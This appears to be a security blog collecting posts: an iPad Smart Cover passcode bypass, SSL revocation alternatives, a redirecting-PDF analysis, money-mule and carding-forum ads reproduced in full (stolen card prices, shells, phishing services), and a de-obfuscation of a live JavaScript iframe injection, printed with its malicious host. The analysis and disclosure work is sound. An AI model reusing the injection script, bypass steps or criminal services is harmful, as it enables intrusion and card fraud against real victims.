iPad 2 security vulnerability – bypass the lock code of an iPad using the Smart Cover.. with solution

Ok so we got the cool-looking iPad Smart Cover, and it has a feature that locks the iPad when the cover is closed.

If you have set a numeric passcode for your iPad (Settings > General > Passcode) and iPad Cover Lock / Unlock is also set to on, your iPad running the latest iOS 5 is vulnerable to a lock-code bypass.

Here is how to reproduce this vulnerability

1. Lock your iPad, either with the power button, by leaving it idle, by closing the Smart Cover, etc.
2. Keep the power button pressed until the "slide to power off" screen appears
3. At this screen, close your Smart Cover
4. Open your Smart Cover and tap Cancel

🙂 you are in … Without having to enter the code..

.. Wait for a formal patch from Apple..

Well guys… just got an update from Saumil.. you cannot make any changes to apps, but you can still view the unlocked screen…

Once you press the home button you are returned to the locked screen again..

Still, it discloses what was on screen when you locked your iPad..

Thanks to Saumil, http://saumil.net

.. Oct 24 2011 ..

You can set iPad Cover Lock / Unlock to off in Settings, after which the bypass no longer works..

SSL certificates CRL weakness and alternatives

Recently COMODO, a trusted root authority, suffered a hack that allowed an attacker to issue fake SSL certificates. Fake certificates in the names of Gmail, Skype, Mozilla and Yahoo were issued. COMODO confirmed the breach at one of its resellers, where the RA was compromised, and issued CRLs (Certificate Revocation Lists) that inform users that the fake certificates have been revoked.


Certificate Revocation Lists are lists of revoked certificates published by an RA at a periodic interval. Most newer browsers refresh their CRLs at start-up. CRLs are a point-in-time representation of the revoked certificates and do not check certificate status in real time.

There are a number of initiatives that attempt to overcome this weakness of CRLs.

Google Certificate Catalog

Google’s crawlers scan the web on a regular basis to provide search services. In the process the Google robots keep a record of every SSL certificate seen. The record is the SHA-1 hash of the certificate, represented as a hex number.

Google requires the site to satisfy the following criteria before the certificate is included:

1. It must be signed by a valid CA

2. It must bear the correct domain name (i.e. the domain from which the cert was taken should match the name on the certificate).

One can look up a TXT record under the certs.googlednstest.com domain using the hash computed as above. The DNS answer returns three values:

1. Day the certificate was first seen by Google.

2. Most recent day that the certificate was seen by Google.

3. Number of days in between on which Google saw the certificate.

If one comes across a certificate that is validly signed but for which Google holds no hash, one has grounds for suspicion.

Google is attempting to build automated query validation support into Chrome.
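As an added example (not from the post or from Google), the lookup described above in Python: hash the certificate, form the query name, interpret the three numbers and apply a small policy in which the "no record at all" case is the suspicious one. The query-name form (hex SHA-1 as a label under certs.googlednstest.com) and the day numbers counting from 1970-01-01 are assumptions not spelled out in the post; the certificate bytes and the TXT answer are constructed.

```python
import hashlib
from datetime import date, timedelta
from typing import Optional, Tuple

# Constructed stand-in for a DER-encoded certificate. A real check hashes the
# exact DER bytes the server presented in the TLS handshake.
SAMPLE_DER = bytes.fromhex("308201ff30820168a003020102020101")
# Constructed TXT answer in the shape the post describes: first seen, last seen,
# number of days seen. Day numbers are assumed to count from 1970-01-01.
SAMPLE_TXT = "14909 15258 349"

EPOCH = date(1970, 1, 1)
CATALOG_ZONE = "certs.googlednstest.com"


def catalog_query_name(der_cert: bytes) -> str:
    """Hex SHA-1 of the certificate used as a label under the catalog zone
    (label placement is an assumption, not stated in the post)."""
    return hashlib.sha1(der_cert).hexdigest() + "." + CATALOG_ZONE


def parse_catalog_txt(txt: str) -> Tuple[date, date, int]:
    """Turn the three numbers into (first seen, last seen, days seen) and
    reject answers that cannot be right (e.g. more days seen than the span)."""
    first, last, days = (int(x) for x in txt.split())
    if not (first <= last and 0 < days <= last - first + 1):
        raise ValueError("inconsistent catalog answer: %r" % txt)
    return EPOCH + timedelta(days=first), EPOCH + timedelta(days=last), days


def assess(txt: Optional[str], today: Optional[date] = None, min_days: int = 7) -> str:
    """Policy sketch: a signed certificate Google has never seen is the case the
    post calls suspicious; very few sightings, or none lately, also deserve a look.
    The answer arrives over plain DNS, so it is a hint, not an authenticated fact."""
    today = today or date.today()
    if txt is None:
        return "unknown"       # signed, but never seen by Google's crawlers
    first, last, days = parse_catalog_txt(txt)
    if days < min_days:
        return "new"           # seen on too few days to carry much weight
    if (today - last).days > 30:
        return "stale"         # Google stopped seeing it: replaced, or revoked
    return "established"
```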


DANE (DNS-based Authentication of Named Entities) is an initiative of the Internet Engineering Task Force (IETF). The idea is to let domain owners publish in DNS information about the SSL certificates used on their hosts: the valid certificates themselves, or the CAs that are allowed to sign certificates for those hosts.

So if one comes across a certificate that is not consistent with the information published in DNS, one should be suspicious.

Since this relies on DNS alone it is not secure by itself (queries go over UDP, nothing is encrypted, etc.).


DNSSEC tries to overcome the above problem by publishing the records in an encrypted / signed manner to protect their confidentiality / integrity.


OCSP (Online Certificate Status Protocol) queries a server to retrieve the real-time status of a certificate.

Under OCSP, issued certificates carry an OCSP “authority identifier” field. Certificate applications use OCSP “requestor” software to request status from an OCSP “responder.”

A browser (requester) can query a responder (a server at the CA, identified to the browser by the ‘authority identifier’) to obtain the validity of a certificate in real time.

DV, OV and EV certificates.

The newer classes of SSL certificates try to control the problem at the issuance level.

Most certificates seen in the market are economical DV (Domain Validated) certificates. These only certify that the applicant had control over the domain name at the time of issue.

OV (Organization Validated) certificates require companies to submit additional documentation at issuance and certify the company that owns the domain.

EV (Extended Validation) certificates follow more stringent criteria at issuance. Newer browsers show a green URL bar that displays the certificate name and issuer.

Fraudulently issued certificates can be used to create authentic-looking phishing sites / browser plug-ins that lead a user to believe the site / plug-in is genuine. This poses a big risk, and the countermeasures discussed above can address it to a great extent.

File-based malware analysis – PDF files – part 1

PDF has become the preferred format for document exchange and is considered more secure (?) than its Microsoft Office counterparts.

The capability to include (limited) scripting has been useful for creating dynamic PDF files, but the same functionality is being used by malware authors.

With a few lines of code it is very easy to make a PDF file carry a redirection to any other site.

I was not sure it made sense to include a readily available ‘malicious’ file here, so I wrote one myself.

The file may be downloaded and it is safe..

I am including the hashes so one can compare:

MD5 : 1a4da40cdeac17ad239250e392a86141
SHA1 : ba5cf3d59ce605ca774d5b5e02963623b1f902da
SHA256: f3d7fe83af30001ec6d6d88c4fc2a43ad7bd7b8cc93466e80e78fe8418fe90f1

and the file itself.. for you to download and try:

Download PDF redirection example

Now this file comes out clean through VirusTotal..


The file tries to redirect the user to this very site, i.e. tusharvartak.com.

The file may be analysed with a simple text viewer, and the code looks like this:

—–pdf code—–

%PDF-1.4
% Listing as posted, with the structural keywords (endobj, stream/endstream,
% xref, trailer, %%EOF), the BT/ET text operators and the unclosed dictionary
% of object 4 restored so that the file is well formed.

7 0 obj
<< /Type /Font /Subtype /Type1 /Name /F1 /BaseFont /Helvetica /Encoding /MacRomanEncoding >>
endobj

6 0 obj
[/PDF /Text]
endobj

% Length covers the BT..ET stream below (the post gave 46 for a stream without BT/ET)
5 0 obj
<< /Length 47 >>
stream
BT
/F1 10 Tf
100 700 Td
(Test redirection)Tj
ET
endstream
endobj

4 0 obj
<< /Type /Page /Parent 3 0 R /MediaBox [0 0 612 792] /Contents 5 0 R /Resources << /ProcSet 6 0 R /Font << /F1 7 0 R >> >> >>
endobj

3 0 obj
<< /Type /Pages /Kids [4 0 R] /Count 1 >>
endobj

2 0 obj
<< /Type /Outlines /Count 0 >>
endobj

1 0 obj
<< /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 8 0 R >>
endobj

8 0 obj
<< /Type /Action /S /URI /URI (h ttp://tusharvartak.com) >>
endobj

% The xref offsets below are the original file's; they will not match this
% listing, and the startxref line was not posted. Readers rebuild the table.
xref
0 9
0000000000 65535 f
0000000565 00000 n
0000000509 00000 n
0000000440 00000 n
0000000273 00000 n
0000000169 00000 n
0000000136 00000 n
0000000012 00000 n
0000000662 00000 n
trailer
<< /Size 9 /Root 1 0 R >>
%%EOF

—–pdf code—–

cakewalk huh..

here’s the interesting code..

8 0 obj
<< /Type /Action /S /URI /URI (h ttp://tusharvartak.com) >>

The bulky PDF reference from Adobe tells us that a URI action resolves a URL..

Since PDFs (the unencrypted ones..) hold these actions mostly as plain text strings, it is possible for a URL filtering solution to detect the redirection to a malicious URL..

It is further possible to obfuscate the URL contained in the file; I will post on that soon..
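As an added example (not the post's code), a small scanner in Python for the behaviour described above: it walks the objects of a PDF, collects every /URI action, decodes both string encodings PDF allows for the URL (literal strings with octal escapes, and hex strings, which is one easy way to hide the plain-text URL a filter would look for), and reports which URIs fire automatically through the catalog's /OpenAction. The sample PDF is constructed here, modelled on the listing above.

```python
import re
from typing import Dict, List

# Constructed sample, not the downloaded file: a minimal PDF whose catalog
# /OpenAction points at a /URI action, plus two more URI actions that use the
# other string encodings PDF allows (hex string, octal escape in a literal).
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 3 0 R /OpenAction 8 0 R >>
endobj
8 0 obj
<< /Type /Action /S /URI /URI (http://example.test/redirect) >>
endobj
9 0 obj
<< /Type /Action /S /URI /URI <687474703a2f2f6578616d706c652e746573742f686578> >>
endobj
10 0 obj
<< /Type /Action /S /URI /URI (http://example.test/esc\\051aped) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

OBJ = re.compile(rb'(\d+)\s+\d+\s+obj\b(.*?)\bendobj', re.S)
# /URI key followed by a literal string (...) or a hex string <...>
URI_STRING = re.compile(rb'/URI\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)', re.S)
SIMPLE_ESC = {0x6E: 10, 0x72: 13, 0x74: 9, 0x62: 8, 0x66: 12}  # \n \r \t \b \f


def decode_literal(body: bytes) -> str:
    """Undo PDF literal-string escapes (\\ddd octal and the named ones).
    Balanced unescaped parentheses inside the string are not handled."""
    out, i = bytearray(), 0
    while i < len(body):
        if body[i] == 0x5C and i + 1 < len(body):          # backslash
            octal = re.match(rb'[0-7]{1,3}', body[i + 1:i + 4])
            if octal:
                out.append(int(octal.group(), 8) & 0xFF)
                i += 1 + len(octal.group())
                continue
            out.append(SIMPLE_ESC.get(body[i + 1], body[i + 1]))
            i += 2
            continue
        out.append(body[i])
        i += 1
    return out.decode('latin-1')


def decode_hex(body: bytes) -> str:
    digits = re.sub(rb'\s+', b'', body)
    if len(digits) % 2:
        digits += b'0'                 # PDF pads an odd final digit with 0
    return bytes.fromhex(digits.decode('ascii')).decode('latin-1')


def uri_strings(body: bytes) -> List[str]:
    return [decode_literal(m.group(1)) if m.group(1) is not None else decode_hex(m.group(2))
            for m in URI_STRING.finditer(body)]


def extract_uri_actions(data: bytes) -> Dict[int, List[str]]:
    """Every object that is a /URI action, keyed by object number."""
    return {int(m.group(1)): uri_strings(m.group(2))
            for m in OBJ.finditer(data) if re.search(rb'/S\s*/URI\b', m.group(2))}


def open_action_uris(data: bytes) -> List[str]:
    """URIs that fire without a click: an /OpenAction that is, or refers to, a /URI action."""
    objects = {int(m.group(1)): m.group(2) for m in OBJ.finditer(data)}
    hits: List[str] = []
    for m in re.finditer(rb'/OpenAction\s*(?:(\d+)\s+\d+\s+R|(<<.*?>>))', data, re.S):
        body = objects.get(int(m.group(1))) if m.group(1) else m.group(2)
        if body and re.search(rb'/S\s*/URI\b', body):
            hits.extend(uri_strings(body))
    return hits
```

A filter that only greps for "http" in the raw bytes misses the hex-string form; decoding the strings first is what makes the check hold up.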

It is interesting to see that if you download the PDF file referred to above and open it with Acrobat Reader, it asks whether the user wants to navigate to the site and allows one to block it.

Download PDF redirection example

Now try clicking the link in a browser that can display PDF files through an add-in (which means almost all browsers in use today).

The file will open in the browser and redirect the user to tusharvartak.com.

Money mules recruitment drive – fraudsters recruiting people online

fraudsters are looking for FREELANCE MONEY MULES !

Eligibility criterion – just one online bank account..

Most of us reading this post already know about money mules.. for those who don’t, reproducing the definition from Wikipedia..


A money mule is a person who transfers stolen money or merchandise from one country to another, either in person, through a courier service, or electronically. The term is commonly used to describe on-line scams that prey on victims who are unaware that the money or merchandise they are transferring is stolen. In these scams, the stolen money or merchandise is transferred from the victim’s country to the scam operator’s country.

Online money mule scams typically exist as a result of other types of online fraud, such as phishing scams, malware scams or scams that operate around auction sites like eBay. After money or merchandise has been stolen using any of those methods, a scammer will employ a mule to relay the money or goods to the scammer. This process obscures the scammer’s true identity and location from the initial victim. Money mules may be subject to criminal prosecution for their actions.

Money mules are commonly recruited with job advertisements for “payment processing agents,” “money transfer agents,” “local processors,” and other similar titles. Some money mules are recruited by a scammer posing as an attractive member of the opposite sex. Candidates are asked to accept payments and to remit most of the funds to a third party — a job which can be done from one’s own home. Legitimate companies use escrow services for this kind of work. Scammers trading in stolen goods use similar tactics to recruit mules who receive packages and then forward them to mail drops in the scammer’s home country.


The platform chosen this time is an online freelancing site.. the fraud participant is promised assured orders if things go well…

I need somebody who can make online bank accounts.

I need these accounts to be with banks that have online banking. They can be in any country in the world. I will supply Name & Addresses & email address.

I don’t require or want any overdraft or any credit/debit card. Just a very simple online bank account.

At first I will just need 1 online bank account. However if everything works well then you can be assured of regular orders.

If anything is unclear or you have questions, please leave me a message on the project message board.

PayPal appears to be the preferred method of payment.. here’s another one who offers $20:

I need help from anyone. I will paypal $20 instantly to anyone for the following information. If you already own a bank account with some bank, if the bank allow you to open a new account online with easy, instantly, without any hassles or visiting bank in person…

Good Morning..

Underground economy 3 – Phoenix exploit kit fake antivirus and live C&C server

After MPack there has been a set of exploit kits released targeting PDF vulnerabilities. Some of the recent ones are CrimePack and Phoenix.

Here is a live command and control center for Phoenix, located at


(please be careful with this url, recommended precautions include a virtual machine that you are willing to sacrifice)

The URLs that get into the iframe injections are


This is a trojan dropper; most up-to-date AVs will detect it as a Fake AV variant. Phoenix uses multiple fake antivirus products for distribution: from Nano versions to Pro to Defender variants, we got it all!

The second URL that gets into an iframe injection, as shown in the earlier post De-obfuscating JavaScript for malware analysis, is


Again this is LIVE and carrying a powerful set of exploits, so please have a virtual machine handy for the analysis. The malware targets most of the recent vulnerabilities discovered in Adobe Reader, Internet Explorer, Adobe Flash Player and Java.

I could get the actual exploit pack, consisting of two JS, two HTML, one Flash and one ASM file…

Trying to get the password for the zip file.. as soon as I get the files open I will post more analysis..


Underground economy 2 – try before you buy, track1 and track2 data

Here is a Russian blog offering track 1 and track 2 data for a test drive.. I wonder if this can be validated without encoding it onto a card?

A Google-translated version follows..


MA laws regarding MY MENU .. You CALLL for what needs to IMEDIETE effect on .. I DONT rippers here to STAY OFF .. I will not let you into buying experience .. I AGREE LibertyReserve …. WESTERN UNION. .. .. MONEY WEB .. M. competent in MY BUSINESS .. ALL MY ITEM ARE in the database.

Reply with quote EVERYTHING YOU NEED.THANK you for choosing our service.

Bank transfers.
Dumps.
Skimmers.
CVV FULL + information.

Sample track 1 and 2 for us


Always fresh and tested before being sold.


Underground economy – CC numbers, Mag Strip info, CVV on sale

A real-world, recent post from the underground economy offering credit card numbers, CVVs etc. for sale..

I stumbled across an underground posting offering for sale:

  • Freshly skimmed cards
  • cvv2
  • ATM pin numbers
  • spamming service
  • phishing page development
  • credit card writer (could get a pic from net)

  • and a lot of bank data up for sale

please find below the image version..


and the text version


I’m Sell freshly skimmed not hacked or generated, all Dumps are tested before sale. all dumps with original track1 and 2 Freshly ccv,paypal,mailer,leads,bank login,smtp,rdp Skimmed with camera and dial pad 100% working. No resales or fakes. NO RIPPERS CO


Mailers,C-Panel,SMTP,email leads etc!!!

Sell CVV2 Fresh

CVV From All Country In World Is Available.
and You Can ask For Special Bin.
We Search In Our Big Db.

CVV Selling Option :
We Checked Cvv B4 Sell You.
We Replace Dead Cvv In 48 Hurs.

Price List :
Usa ccv Visa : 3$
Usa ccv Master : 3$
Usa ccv Amex : 6$
Usa ccv Discover : 6$
Usa ccv With D.o.B : 12$
Usa ccv Fullz : 25$
Usa ccv With Full Infos : 30$

Uk ccv Visa : 5$
Uk ccv Master : 5$
Uk ccv Discover : 8$
Uk ccv With D.o.B : 15$
Uk ccv Fullz : 25$
Uk ccv With Full Info : 35$

Germany ccv Visa : 10$
Germany ccv Master : 10$
Germany ccv With D.o.B : 15$
Germany ccv Fullz 30$
Germany ccv With Full Info : 40$

Italy ccv Visa : 10$
Italy ccv Master : 10$
Italy Ccv With D.o.B : 15$
Italy ccv Fullz : 25$
Italy ccv With Full Info : 30$

Etc For More Price Of Ccv’s……….
Price List Of Dumps……
Price for dumps With ATM PIN and Good Balance :

Usa Dumps Classic : 25$
Usa Dumps Platinum : 50$
Usa Dumps Gold : 50$
Usa Dumps Corporate : 70$

Uk Dumps Classic : 30$
Uk Dumps Platinum : 50$
Uk Dumps Gold : 55$
Uk Dumps Corporate : 60$

Italy Dumps Classic : 40$
Italy Dumps Platinum : 70$
Italy Dumps Gold : 100$
Italy Dumps Corporate : 120$

Europe Dumps Classic : 100$
Europe Dumps Platinum : 150$
Europe Dumps Gold : 150$
Europe Dumps Corporate : 200$

Other countries:
MasterCard| Visa Classic – 40$
Visa Gold|Platinum|Corporate|Signature|Business – 80$

Etc For More Price Over Dumps……..

Maillist / Mailers / Cpanel ( $10 – $30 )

Transfers :
WU Transfer – 10% upfront of whatever amount you want us to transfer for you
eg: if you want $1000 you will have to pay $100 upfront.

We make Wire transfer and cheque transfer to
UK and US banks .. HSBC // Nationwide //Halifax //Abbey // Capital // BOA // watchovia //
Barclays // FCU / Regions / Wells // etc..

Cost is 10% upfront of whatever amount you want us to transfer for you ( will accept an offer depending on the amount to be transfered )

Fulls come with this info
Firstname, Lastname, Address, City, State, Zipcode, Phone, SSN, Mother’sMaidenName, DOB,
Driver’s License # and state, Email pass , Verifiedbyvisa pass, Cardnumber, Expiry Date, CVV2,
Employment, Position Held
Bank pass, number, name, account number and Routing Number and other infoz.
cc fullz info us = $25
cc full info uk & eu & asia = $40

We Have Shopadmin, cc in this shopadmin have full info

Shipping Service :
We Have Good and Safe Service For Ship Product To Your Address.
Our Service Is Very Fast and Without Delay.
You Can Select Your Item In Shopping and Give link .
We buy your Product For You and send To Your Address.
We Can Ship All Item TO WorldWide Ship Address.
Our Service Is Very Cheap.

We Can Ship Laptop and Iphone And All Electronic Item To Your SHipping Address.

spamming Service :

We Have Good stuff For Spamming.
If You are Spammer. We Have Good And Work Stuff for You.

Inbox Mailer :
Web Mailer and Good Mailer Software Is Available for You.
We Have Good Php and Ajax Web Mailer For You.
And We Have Good Software For Spamming For All Spammer.

Mail List And Lead :
We Have Fresh And Active And New Mail List And Lead For You.
All Mail List And Lead Is From Bank Member or Shopping User.
and Our Price for Spamming Stuff Is cheap.
and mail list from all country is available.

Cpanel and Hosting and Shell:
Cpanel with dedicated Ip And big space And High Speed For Spamming is Available For You.
and good hosting panel is Available for you. this is very good offer for spamming.

yes we have good shell for you.
we have php and asp shell for sale.
this is special offer for spamming.

Remote Desktop (RDP) :
We Have High Speed And Bandwith For Spamming.
with windows server 2003 and with windows server 2008.
and all server have big hard space.
very good offer for big download and big upload from this.

We Have Good SMTP For All Big Spammer.
With Good Ip . and high speed.

Mail Sender And Mail Spider :
Email Spider Gold . to Auto Haverst emails from the internet “Websites , and forums”
Advanced Mass Sender ( This Best Program To spam email useing SMTP where u will get them using Smtp scanner “Hscan”)

Bank Login :
Bank Login From Usa And Eu And Uk And Asia Is Avaiable.

Scotia OnLine
Bremer Online Banking
Flagstar Bank
KBC Bank
Credit Union
American Express
Wells Fargo
Pen Air Federal
U.S. Bank
First Trust Bank
Banque Nationale

And We Have Good Service For Bank Transfering For You .
And Our Service Is Very Fast And Safe And immediate .

Good Logins :

We Have Good And Fresh And Work Login For You.

Paypal Login :
We Have Verified And Unlimited Paypal Account With Balance And Add Cc And BAnk Accunt.
All Our PayPa Acc Have Full Info And With Email Access and With All Security Answer . And With Orginal Ip And A Program For Fake Your System Ip To Orgina Ip For Full Access To PayPal Acc.

Ebay Login :
Fresh And Verified And Unlimited Ebay Account.
With Ful Info And Full Access.

MoneyBookers Account :
Verified And Full Access MoneyBookers Account.
Verified With Good Balance.
From All Country.
With Add Verified Cvv And Bank Acc.
With Orginal Ip And With All Security Answer.

ClickAndBuy And Alertpay Account Is Available ….

Merchand Account :

I can make fake ecommerce sites that can help you get approved for MERCHANT ACCOUNTS. And any other type of scam websites. Just tell me what the scheme is like and I help you develop it.
Website design, html/php/flash animations etc. To create fake company websites, fake shopping carts, sites to sell you drugs, skimmers, dumps, cc and other items, bogus bank sites etc.
What you do with your websites is your responsibility. I’ve been in the scene for a very long time vending the same products.

Dump Writer and Reader Machine

MSR206 Reader/Writer USB

Magnetic Swipe Card Reader/Writer MSR206 is designed to offer a card reading/writing solution for ISO 7811/1~6 formats. It reads and writes up to 3 tracks of data, e.g. decoding/encoding and verifying up to 3 tracks of data simultaneously. Also, MSR206 Reader/Writer provides a standard RS-232 interface to communicate with host system or other terminal computers. That will attractively complement an existing system.


* Reading/Writing magnetic stripe card complied with ISO 7811/1~6 formats
* Read/Write High & Low Coercive force of magnetic stripe (300~4000Oe)
* High/Low Coercivity encoding circuitry selectable on screen
* Program software for Windows 98/Me/XP
* Programming software for various read/write performance
* Programmable leading bit, raw data, DMV/AAMVA, and user defined format
* Manual Swipe to read and/or write card with RS-232 output
* Writing and verifying data on single, dual, or triple track in one swipe
* 5~35ips operational swipe speed of writing data
* 5~55ips operational swipe speed of reading data
* +24VDC+/-10%, 2.0A Max., external power adapter attached
* Good size with dimensions of 210(L) x 60(W) x 65(H) mm
* CE, FCC, UL, cUL certified

Price : 200$
With Free Shipping.

Payment Accepted Is Liberty Reserve(LR) , Web Money Zone (WMZ) And Western Union (WU) That All Payment Accepted…..


will post more as I harvest it..

As a tail.. check the post about underground economy try-before-you-buy options..


De-obfuscating JavaScript for malware analysis

I came across a live malware injection in a website.. thought I’d post the details. This one was easy to de-obfuscate as it used only a single level of JavaScript obfuscation.

Have a look at the seemingly innocuous contact-us page. At the time of this analysis the site carrying the malware was not serving any payload.. be careful if you decide to navigate to this page.. the site may be serving payloads..

The interesting obfuscated JavaScript can be seen near the end of the page source..

Let’s have a look at the script below (reproduced at the end of this post)..

We can see:

  1. the two variables k1 and k2 assigned with their (encoded) values..
  2. t1 and t2 initialised as counters for the while loops ahead
  3. a simple shift cipher: each character code of k1 and k2 is moved by a fixed offset and turned back into a character with String.fromCharCode
  4. a document.write to output the resultant string, which loads the malware-laden URL

We have a couple of options here:

  1. work backwards to de-obfuscate the JavaScript by hand
  2. catch the resultant string.. this definitely sounds smarter and easier

So we change document.write(h) to another useful JavaScript function, alert(). We save the page as .html to the desktop and edit the HTML to reflect the changed function.

Note we need the ‘web page, complete’ save option so that the referenced scripts, CSS etc. are saved too.

We make the change..

Now open the HTML page in the browser and bingo!

We have the hidden iframe injection.. please note:

  1. the DIV visibility is set to hidden; frameborder, hspace and vspace are set to zero
  2. the hidden iframe loads a page from the Russian URL http://beefezzazbzfc.users.iframecounter.ru/?s=1

Hope this was useful.. will try to post some other advanced malware analysis..

var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',k2='0wugtu0khtcogeqwpvgt0tw1Au?3$"htcogdqtfgt?2"xurceg?2"jurceg?2"ykfvj?3"jgkijv?3"octikpykfvj?2"octikpjgkijv?2"uetqnnkpi?pq@>1khtcog@>1fkx@',t1=0,t2=0,h='';while(t1<=k1.length-1){h=h+String.fromCharCode(k1.charCodeAt(t1++)-3);}h=h+'beefezzazbzfc';while(t2<=k2.length-1){h=h+String.fromCharCode(k2.charCodeAt(t2++)-2);}document.write(h)
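As an added example (not the author's code), a Python decoder for the "work backwards" option: it replays the script's concatenation steps statically, without executing any JavaScript, so it handles any script of this family (single-quoted string variables appended through charCodeAt shifts and literals). The script quoted above is the sample input; the host it decodes to was serving malware when the post was written.

```python
import re
from typing import Dict, List

# The obfuscated script quoted at the end of the post, used here as sample input.
SCRIPT = r"""var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',k2='0wugtu0khtcogeqwpvgt0tw1Au?3$"htcogdqtfgt?2"xurceg?2"jurceg?2"ykfvj?3"jgkijv?3"octikpykfvj?2"octikpjgkijv?2"uetqnnkpi?pq@>1khtcog@>1fkx@',t1=0,t2=0,h='';while(t1<=k1.length-1){h=h+String.fromCharCode(k1.charCodeAt(t1++)-3);}h=h+'beefezzazbzfc';while(t2<=k2.length-1){h=h+String.fromCharCode(k2.charCodeAt(t2++)-2);}document.write(h)"""

# Single-quoted JS string literals: name='...' (JS escape sequences are left as-is)
STRING_VAR = re.compile(r"(\w+)='((?:[^'\\]|\\.)*)'")
# Each step that appends to h: a shifted copy of a string variable, or a literal
APPEND_STEP = re.compile(
    r"h=h\+(?:String\.fromCharCode\((\w+)\.charCodeAt\(\w+\+\+\)([+-]\d+)\)|'([^']*)')")


def shift_chars(text: str, delta: int) -> str:
    """The cipher itself: every character code moved by delta, which is all
    String.fromCharCode(s.charCodeAt(i) - 3) does."""
    return "".join(chr(ord(c) + delta) for c in text)


def decode(script: str) -> str:
    """Replay the script's h=h+... steps in source order without running it."""
    strings: Dict[str, str] = dict(STRING_VAR.findall(script))
    parts: List[str] = []
    for var, shift, literal in APPEND_STEP.findall(script):
        if var:
            parts.append(shift_chars(strings[var], int(shift)))
        else:
            parts.append(literal)
    return "".join(parts)


def iframe_sources(html: str) -> List[str]:
    """The src of every iframe in the decoded markup, i.e. the injected URL(s)."""
    return re.findall(r'<iframe\b[^>]*\ssrc="([^"]*)"', html, re.I)
```

Running decode(SCRIPT) yields exactly the hidden-DIV-plus-iframe markup described in the post, which is the string alert() would have shown.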